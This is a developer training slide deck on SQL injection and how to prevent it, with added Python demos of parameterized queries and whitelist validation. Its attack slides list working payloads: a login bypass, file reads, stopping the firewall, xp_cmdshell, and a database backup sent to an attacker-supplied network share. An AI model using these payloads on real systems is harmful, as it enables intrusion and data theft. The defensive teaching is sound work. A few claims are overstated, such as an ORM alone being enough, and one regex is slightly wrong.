A1 Injection Flaws
Problem and Protection
Little Bobby Tables
update students set (name) = (' _____ ') where studentID = 33342;
Injection Flaws
o SQL injections occur when the attacker forces statements into the HTTP request in such a way that their SQL statements are run against the database
How attackers do it
1. They find a vulnerable site
2. They type in SQL statements into textboxes, URLs, or inject them into other field forms using a request manipulator like Fiddler
How attackers do it
o The attacker's injection may look like this:
  12; update orders set amtDue=0 where orderID=1234; --
o And the code that runs it might look like this:
  string sql = "SELECT catID FROM items WHERE prodID = " + txtProdID.Text;
  var cmd = new SqlCommand(sql, myConn);
  var categoryID = cmd.ExecuteScalar();
o So the resulting SQL run would look like this:
  select catID from items where prodID = 12; update orders set amtDue=0 where orderID=1234; --
How to break in without a password
o Scenario: textboxes for username/password
o Injection: admin' OR 1=1--
o Resulting SQL: select userID from user where username = 'admin' OR 1=1 --' and password = '';
How to gather intel about the installation
SQL attack vector                          Data gathered
0; select @@version; --                    Database version
0; select @@servername; --                 Actual server name
0; select @@microsoftversion; --           OS name and version
0; select * from master..sysservers; --    List of other servers
0; select * from sysusers; --              All user accounts
How to get a list of tables
0; SELECT so.name, MAX(si.rows) AS numrows FROM sys.sysobjects AS so INNER JOIN sys.sysindexes AS si ON OBJECT_ID(so.name) = si.id WHERE (so.xtype = 'U') GROUP BY so.name; --
name                 numrows
Employees            9
EmployeeTerritories  49
OrderDetails         2155
OrderPayment         1
Orders               830
Products             77
Region               4
Shipment             1
Shippers             3
How to get a table's structure
0; exec sp_columns refundsToProcess; --
How to set a value in a table
0; insert into refundsToProcess (amount, custID, approved) values (932.45, 11234, true); --
How to read files from the hard drives or network
0; create table myfile (line varchar(8000)); bulk insert myfile from 'c:\inetpub\wwwroot\web.config'; select * from myfile; --
How to start and stop OS Services
0; EXEC xp_servicecontrol stop Firewall; --
0; EXEC xp_servicecontrol start telnet; --
How to run OS commands
0; exec master..xp_cmdshell 'reg.exe ADD HKLM\Software\HackersAreUs /v NoAuth /t REG_BINARY /d 0001 '; --
How to steal the whole doggone database!
0; backup database master to disks='\\{IP}\{sharename}\backupdb.dat'; --
How to vacation offshore after pwning us
How we protect ourselves
o Use parameterized statements
o Use stored procedures
o Enforce least privilege
o Validate the input via whitelist
Use parameterized statements
o Single best thing to do
o All other methods can help
o Only this one will halt the attack by itself
o It's the parameters that fix the issue
Use parameterized queries
var cmd = new SqlCommand("select count(*) from users where userID = @userID and pwd = @pwd", myConn);
cmd.Parameters.Add(new SqlParameter("@userID", SqlDbType.NVarChar, 10));
cmd.Parameters["@userID"].Value = txtUserID.Text;
cmd.Parameters.Add(new SqlParameter("@pwd", SqlDbType.NVarChar, 128));
cmd.Parameters["@pwd"].Value = txtPassword.Text;
if (Convert.ToInt16(cmd.ExecuteScalar()) == 0)
    throw new Exception("No dice, chief.");
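An added example (not code from the slides) that puts the login-bypass slide and the parameterized-query slide side by side in Python; it runs against a constructed in-memory SQLite table, so the table contents and the `?` placeholder syntax are assumptions of this example rather than the page's SQL Server/ADO.NET code:

```python
import sqlite3

# Constructed in-memory table standing in for the slides' "user" table
# (an assumption of this example, not the page's schema).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user (userID INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO user (username, password) VALUES (?, ?)",
                     [("admin", "s3cret"), ("alice", "hunter2")])
    conn.commit()
    return conn

def login_concat(conn, username, password):
    """Vulnerable: the query is assembled by string concatenation, like the C#
    snippet earlier in the slides, so the user's text becomes part of the SQL grammar."""
    sql = ("select userID from user where username = '" + username
           + "' and password = '" + password + "'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None

def login_param(conn, username, password):
    """Hardened: the same query with placeholders. The driver ships the values
    separately from the statement, so a quote or comment marker in the input
    is only ever compared as data, never parsed as SQL."""
    sql = "select userID from user where username = ? and password = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None

if __name__ == "__main__":
    db = make_db()
    payload = "admin' OR 1=1--"   # the injection string from the slides
    print("concat :", login_concat(db, payload, ""))        # 1: admin's row, no password needed
    print("param  :", login_param(db, payload, ""))         # None: no user has that literal name
    print("genuine:", login_param(db, "alice", "hunter2"))  # 2: real credentials still work
```

The `--` that ends the payload is a comment marker in SQLite as well as SQL Server, which is why the concatenated version silently drops the password clause.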
ORMs and injection attacks
o ORMs like
  • NHibernate
  • LINQ
  • Entity Framework
o Use parameterized queries natively
o So use an ORM and you're all set!
Use stored procedures
o Stored procedures make it tougher for attackers to inject SQL because procedures are by definition limited to certain activities
CREATE procedure OrderItem(
    @CustomerID nchar(5),
    @ProductID int,
    @Quantity int,
    @OrderID int OUT
) as
declare @UnitPrice money
--First, get Unit Price for the Item sold
set @UnitPrice = (select UnitPrice from Products where ProductID = @ProductID);
--Create the order header and get the orderID
insert into Orders (CustomerID, OrderDate, RequiredDate, ShipVia)
values (@CustomerID, getdate(), DateAdd(Day, 7, getdate()), 3);
set @OrderID = @@IDENTITY;
--Add Order Detail Row
insert into [Order Details] (OrderID, ProductID, UnitPrice, Quantity)
values (@OrderID, @ProductID, @UnitPrice, @Quantity);
go
Stored procedures can be vulnerable
o Example:
  alter procedure DoGenericQuery @query nvarchar(255) as
      exec sp_executesql @query
  go
o This would run ANY other query
o Stay vigilant with procedures
Enforce least privilege
o For all RDBMS activities, use DB users vs. Windows users
o For that DB user, remove all privileges (read, write, modify, grant, deny) on every entity (table, view, procedure, function) until it can be proven that the user needs that privilege
o Basically, whitelist privileges instead of blacklisting them
o If this user needs to read X columns from a table, create a view with only those X columns. Grant privilege on that view and deny it on the table
Validate data via a whitelist
o Test the data being input to make sure that it matches a pattern
o If it doesn't match a pattern, we reject it via a graceful error message
o Pattern = RegEx (___________ _________)
Why not a blacklist?
o You cannot possibly predict all of the possible ways that an attacker will get around our filter
o As in most things in life, where there are only a couple of ways to get something right, there are a near infinite number of ways to do it wrong
Why not a blacklist?
o Example:
  o You blacklist single quotes and semicolons
  o Attacker simply types in ...
    pass concat(char(39), char(32), char(111), char(114), char(32), char(49), char(61), char(49))
  o which is ...
    pass' or 1=1
How to whitelist
o Specify only the patterns that you will allow
Description                                                     Regular Expression
Safe text. Letters, numbers, whitespace, dots, & dashes only.   ^[a-zA-Z0-9\s.\-]+$
Social Security number                                          ^\d{3}-\d{2}-\d{4}$
One of the 50 states                                            ^(AL|AK|AZ|AR|CA|CO|...|TX|UT|VA|WA|WV|WI|WY)$
US telephone number                                             ^\D?(\d{3})\D?\D?(\d{3})\D?(\d{4})$
Credit card number                                              ^((4\d{3})|(5[1-5]\d{2})|(6011)|(7\d{3}))-?\d{4}-?\d{4}-?\d{4}|3[4,7]\d{13}$
How to whitelist
string whitelist = @"^\d{3}-\d{2}-\d{4}$";
if (!new Regex(whitelist).IsMatch(txtSSN.Text))
    throw new Exception("Quit that hacking!");
o Note the @-sign. Needed because ______
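An added example (not part of the slides) that runs the blacklist bypass from the "Why not a blacklist?" slide and the whitelist patterns from the table above through Python; the helper names and the use of Python's `re` module in place of .NET's Regex are assumptions of this example:

```python
import re

# The blacklist the slides warn against: reject anything containing ' or ;
BLACKLIST = re.compile(r"[';]")

# Whitelist patterns copied from the slides' table.
SAFE_TEXT = re.compile(r"^[a-zA-Z0-9\s.\-]+$")
SSN = re.compile(r"^\d{3}-\d{2}-\d{4}$")

# The bypass from the slides: no quote and no semicolon in the text itself,
# because SQL Server's char()/concat() would rebuild them at query time.
BYPASS = ("pass concat(char(39), char(32), char(111), char(114), "
          "char(32), char(49), char(61), char(49))")

def blacklist_allows(value):
    """True if the quote/semicolon blacklist would let the value through."""
    return BLACKLIST.search(value) is None

def whitelist_allows(pattern, value):
    """True only if the entire value matches the allowed pattern.
    fullmatch is used so a trailing newline cannot slip past the $ anchor."""
    return pattern.fullmatch(value) is not None

def decode_char_calls(value):
    """Assemble the char() codes the way the database would, to show what
    the blacklist actually let through."""
    return "".join(chr(int(code)) for code in re.findall(r"char\((\d+)\)", value))

def validate(pattern, value):
    """Whitelist check in the spirit of the slides' C# snippet: reject with
    an error rather than trying to clean the input up."""
    if not whitelist_allows(pattern, value):
        raise ValueError("Quit that hacking!")
    return value

if __name__ == "__main__":
    print("blacklist lets bypass through:", blacklist_allows(BYPASS))     # True
    print("safe-text whitelist allows it:", whitelist_allows(SAFE_TEXT, BYPASS))  # False
    print("bypass decodes to:", repr(decode_char_calls(BYPASS)))          # "' or 1=1"
    print("SSN check:", validate(SSN, "123-45-6789"))
```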
Summary
o If the opportunity to inject SQL into our pages is present, attackers can inflict extremely serious and irreparable harm to our organization
o This is the top-rated web vulnerability known to man
o It can be mitigated by:
  • Whitelisting user input
  • Using stored procedures
  • Enforcing least privilege
  • Using parameterized statements
p.s. Not just SQL Injections
o Injection attack vectors include:
  • OS commands
  • HTML injections
  • LDAP injections
  • XML/XPath/XSLT
o The solutions are the same as for SQL, though
Further study
o Pocket guide to web security:
  • http://amzn.to/PocketGuideWebSecurity
o Very thorough reference on injection attacks:
  • http://bit.ly/InjectionAttackReference
o Tricks on overcoming blacklist filters:
  • http://bit.ly/OvercomingBlacklists
o List of SQL injection attack vectors:
  • http://bit.ly/SQLInjectionCheatSheet